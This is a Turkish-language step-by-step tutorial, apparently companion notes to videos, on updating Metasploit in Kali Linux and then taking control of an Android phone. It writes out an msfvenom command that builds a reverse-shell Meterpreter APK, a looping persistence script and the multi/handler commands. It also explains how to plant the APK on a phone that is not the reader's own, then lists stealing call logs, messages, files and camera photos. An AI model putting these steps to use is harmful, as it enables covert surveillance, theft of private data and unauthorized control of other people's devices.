Notes

==================================================

3 : M.e.t.a.sploit ayarlar, guncelleme, kayit olma. - Video Link
Yuklemis oldugumuz Kali Linux isletim sistemimiz icerisinde zaten hazir olarak geldigi icin yeniden indirip kurmamiza gerek yok.
Sadece guncelleyip, kayit olup, kayit islemi bittikten sonra ayarlarimizi yapacagiz.
Guncelleme icin komutlar sirasiyla ;
apt-get update
apt-get upgrade
apt-get dist-upgrade
Guncellemeler bittikten sonra m.e.t.a.sploit konsolu calistirmak icin komutlar ;
service postgresql start
service ****sploit start
Sql ve m.e.t.a.sploiti sistem baslangicina eklemek istersek eger, bunun icin komutlar ;
update-rc.d postgresql enable
update-rc.d ****sploit enable

Yukarida * ( yildiz ) seklinde gorunen yerleri m.e.t.a.sploit ( noktalar olmadan ) olarak yaziniz.

Islemler bittikten sonra kayit islemi icin asagidaki komutu giriyoruz.
msfconsole
go_pro
Otomatik olarak acilacak olan tarayicidaki yonergeleri takip ederek kayit islemimizi tamamliyoruz.
Not : Vpn ile ip adresinizi USA ve Canada olacak sekilde ayarlayiniz. USA ve Canada disindaki ulkeler icin problemli bir surec oldugu icin problem yasama olasiliginiz yuksek.

==================================================

4 : Android kontrol + kalici baglanti olusturma ( Cihaz yeniden basladiginda bu baglanti gider. Yeniden baslatma sonrasi baglanti uzerinde arastirmalarim devam ediyor. Konu ile ilgili gelisme olursa paylasirim. ) M.e.t.a.sploit videosu icerisinde anlatimi var.

M.e.t.a.sploit'in guncellemelerinide tamamladiktan sonra son konumuz olan android kontrolune gecebiliriz. Sirasiyla yapacagimiz islemler ;

-Apk dosyamizi olusturmak.
Apk dosyasini olusturmak icin Kali Linux uzerinde yeni terminal acarak asagidaki komutu giriyoruz.
Not : Girecegimiz komutdaki "LHOST=" dan sonra gelen ip adresi, sanal masaustunuzun ip adresi olacak. "LPORT=" dan sonra gelen port numarasi da daha once acmis oldugunuz port numarasi olacak. Ben ornek olarak kendi ip adresimi ve port numaralarini yaziyorum. Siz kendinize gore ayarlayiniz.
msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.2.250 LPORT=4444 R > /root/Desktop/test.apk
Olusturdugumuz Apk dosyasini Kali Linux uzerinde masaustunde bulabilirsiniz.

==================================================

-Apk dosyamizin android cihazinda kalici olarak calismasini saglamak icin gereken dosyayi olusturmak. ( Burada bahsettigimiz kalicilik, android cihaz kapatilana kadar kadardir. Android cihazlari ile telefonlari kastettigimizi varsayar ve telefonlarimizi sarjlari bitmedigi surece kapatmadigimizi goz onune alirsak, bu kaliciligin uzunca bir sure aktif olacagini dusunebiliriz. ) Telefon kapatildiginda apk dosyamiz islevselligini kaybeder.
Kaliciligi saglayacak olan dosyamizi olusturmak icin yeni bir txt dosyasi aciyoruz. Asagida verilen metini girdikten sonra dosyamiza isim verip, uzantisini .sh olarak kayit ediyoruz. ( Videodaki dosyayi silememe rezaleti icin ozur dilerim. Sabahin o saatinde Shift + Delete yapmak aklima bile gelmedi ^^ )
Dosya ismine istediginiz seyi yazabilirsiniz. Dosya uzantisinin .sh seklinde olmasi onemli kisim.
#!/bin/bash
while true
do am start --user 0 -a android.intent.action.MAIN -n com.****sploit.stage/.MainActivity
sleep 15
done

Yukarida * ( yildiz ) seklinde gorunen yerleri m.e.t.a.sploit ( noktalar olmadan ) olarak yaziniz.
Not : Yukarida gorulen 15 rakami zaman birimidir. Scriptin tekrar calismasini istedigimiz zaman araligini belirtir. Ben 15 sn olarak ayarladim. Siz isterseniz bu sureyi daha uzun ya da kisa olarak ayarlayabilirsiniz.

==================================================

-Apk dosyasini telefona yuklemek.
Olusturdugumuz Apk dosyasini usb kablo araciligi ile telefona gonderiyoruz.
Bahse konu olan telefon size ait degilse ve direk erisim sansiniz yoksa olusturdugunuz Apk dosyasini herhangi bir upload sitesine yukleyerek link araciligi ile telefona yuklenmesini saglayabilirsiniz.
Telefon yakinda ise bluetooth secenegini degerlendirebilirsiniz.
Bu asama tamamen sizin seceneklerinize ve olanaklariniza bagli.

==================================================

-M.e.t.a.sploit ile kontrolu ele almak.
Apk dosyasini telefona gonderdiginizi varsayarak isleme devam ediyoruz.
Telefona gondermis oldugumuz Apk dosyasinin calistirilmasindan once Kali Linux isletim sistemi uzerinde terminal acarak asagidaki komutlari sirasiyla giriyoruz.
use multi/handler
set payload android/meterpreter/reverse_tcp
set lhost 192.168.2.250
set lport 4444
show options "ip adresinin ve port numarasinin ayarlanmis oldugunu dogrulamak icin tekrar kontrol ediyoruz. Eger dogru sekilde ayarlanmis ise asagidaki komutu giriyoruz."
exploit

Komutu calistirdiktan sonra Apk dosyamizi telefonda kurup calistiriyoruz. Eger bu asamaya kadar herseyi dogru bir sekilde yaptiysak Apk dosyasi calisir calismaz telefon ile m.e.t.a.sploit etkilesime geciyor ve bu dakikadan itibaren telefonun kontrolunu ele aliyoruz.

==================================================

-Kaliciligi saglayacak dosyayi telefona yuklemek.
Telefonun kontrolunu ele alir almaz ilk yapmamiz gereken sey, daha once olusturdugumuz .sh uzantili dosyamizi telefona yuklemek.
Bu asamada, dosyamizi erisimimiz olmayan klasorlere upload etmeye calisarak zaman kaybetmeden once hangi klasorlere erisimimiz oldugunu kontrol etmek en iyisi.
Bunun icin sirasiyla "cd /" "ls" komutunu girerek telefon icerigini goruntuluyoruz.
rw- rw- rw- ya da rwx rwx rwx seklinde gorunen klasorler, yazma iznimiz olan klasorlerdir. Eger system klasoru bu sekilde gorunmuyorsa yazma erisimimiz yok demektir. Bu durumda zaman kaybetmeden .sh uzantili dosyamizi yazma iznimiz olan bir klasore yukluyoruz.
Oncelikle "cd" komutu ile yazma iznimiz olan klasore giriyoruz. Bunun icin komutumuz asagidaki gibidir ;
cd system
*Ister direk ana dizine yukleyin, isterseniz daha derine inerek baska bir klasore yukleyin. Tamamen size kaliyor.
System klasorune geldikten sonra .sh uzantili dosyamizi yukluyoruz. Bunun icin komut asagidaki gibidir ;
upload test.sh
*Dosyanizin ismini dogru yazdiginizdan emin olunuz. Ben test.sh olarak isimlendirmistim. Siz kendinize gore degistiriniz.
Dosyamizi upload ettikten sonra calistirmamiz gerekiyor. Bunun icin komutlar asagidaki gibidir ;
shell
cd system
Burada listeleme komutunu kullanarak test.sh dosyamizi kontrol ediyoruz. Komut asagidaki gibidir ;
ls
Gelen listede test.sh isimli dosyamiz mevcut ise dosyamizi calistirmamiz gerekiyor. Komut asagidaki gibidir ;
sh test.sh
Komutu girdikten sonra sh scripti aktif hale gelecektir. Bundan sonra yapmamiz gereken sey shell'i kapatmak. Bunun icin klavyenizden Ctrl+C tuslarina basmaniz yeterli.
Not : Yazma izniniz olan herhangi bir klasore de yukleyebilirsiniz. System klasoru olmak zorunda degil.

Tum bu islemlerden sonra telefon ile olan baglantiniz, telefon kapatilana kadar devam edecektir. Kali Linux uzerinde calisan terminalinizi, hatta sisteminizi yeniden baslatsaniz bile, sistem yeniden basladiktan sonra m.e.t.a.sploit'i calistirarak baglantiyi tekrar saglayabilirsiniz.
Bu asamadan sonra yapabileceginiz islemlerden bazilari ;
Telefon'un arama kaydini almak.
Telefondaki mesajlari almak.
Telefondaki dosyalara goz atmak ve bilgisayariniza kopyalamak.
Telefonun kamerasi ile resim cekmek ve bilgisayariniza kopyalamak.
Videoda ornek olarak gosterilmistir.
Gerisi size kaliyor.

==================================================